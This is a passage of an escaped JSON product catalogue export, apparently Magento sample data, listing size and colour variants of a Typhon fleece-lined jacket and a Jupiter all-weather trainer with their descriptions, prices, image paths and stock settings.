Performance Fleece-lined Jacket-L-Green\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"331\":{\"sku\":\"MJ11-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-L-Red\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"332\":{\"sku\":\"MJ11-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-XL-Black\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},\"333\":{\"sku\":\"MJ11-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-XL-Green\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-xl-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Green\"},\"334\":{\"sku\":\"MJ11-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket-XL-Red\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"typhon-performance-fleece-lined-jacket-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"335\":{\"sku\":\"MJ11\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Typhon Performance Fleece-lined Jacket\",\"description\":\"<p>Ironmen and couch warriors both reach for the Typhon Performance Fleece-lined Jacket. After all, no man can resist ultra-soft microfleece lining. Flatlock seams make it ideal for wearing over everything from tanks and tees to high-tech base layers.<\\/p>\\n<p>&bull; Black full-zip flight jacket.<br \\/>&bull; Cocona&reg; wicking fiber.<br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"60\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,style_general=Insulated|Heavy Duty|Hard Shell|Windbreaker|Full zip,material=Cocona&reg; performance fabric|Nylon|Polyester,pattern=Solid,climate=All-weather|Spring|Windy|Wintry,eco_collection=No,performance_fabric=Yes,erin_recommends=No,new=No,sale=Yes\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MJ11-XS-Black,size=XS,color=Black|sku=MJ11-XS-Green,size=XS,color=Green|sku=MJ11-XS-Red,size=XS,color=Red|sku=MJ11-S-Black,size=S,color=Black|sku=MJ11-S-Green,size=S,color=Green|sku=MJ11-S-Red,size=S,color=Red|sku=MJ11-M-Black,size=M,color=Black|sku=MJ11-M-Green,size=M,color=Green|sku=MJ11-M-Red,size=M,color=Red|sku=MJ11-L-Black,size=L,color=Black|sku=MJ11-L-Green,size=L,color=Green|sku=MJ11-L-Red,size=L,color=Red|sku=MJ11-XL-Black,size=XL,color=Black|sku=MJ11-XL-Green,size=XL,color=Green|sku=MJ11-XL-Red,size=XL,color=Red\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"image\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj11-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj11-black_alt1.jpg,\\/m\\/j\\/mj11-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"style_general\":\"Insulated|Heavy Duty|Hard Shell|Windbreaker|Full zip\",\"material\":\"Cocona&reg; performance fabric|Nylon|Polyester\",\"pattern\":\"Solid\",\"climate\":\"All-weather|Spring|Windy|Wintry\",\"eco_collection\":\"No\",\"performance_fabric\":\"Yes\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"Yes\"},\"336\":{\"sku\":\"MJ06-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -XS-Blue\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-xs-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"image\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj06-blue_alt1.jpg,\\/m\\/j\\/mj06-blue_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Blue\"},\"337\":{\"sku\":\"MJ06-XS-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -XS-Green\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-xs-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj06-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Green\"},\"338\":{\"sku\":\"MJ06-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Jupiter All-Weather Trainer -XS-Purple\",\"description\":\"<p>Inclement climate be damned. With your breathable, water-resistant Jupiter All-Weather Trainer, you can focus on fuel and form and leave protection and comfort to us. The fabric is a special light fleece that wicks moisture and insulates at once.<\\/p>\\n<p>&bull; Relaxed fit. <br \\/>&bull; Hand pockets. <br \\/>&bull; Machine wash\\/dry.<br \\/>&bull; Reflective safety trim.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"56.99\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"jupiter-all-weather-trainer-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\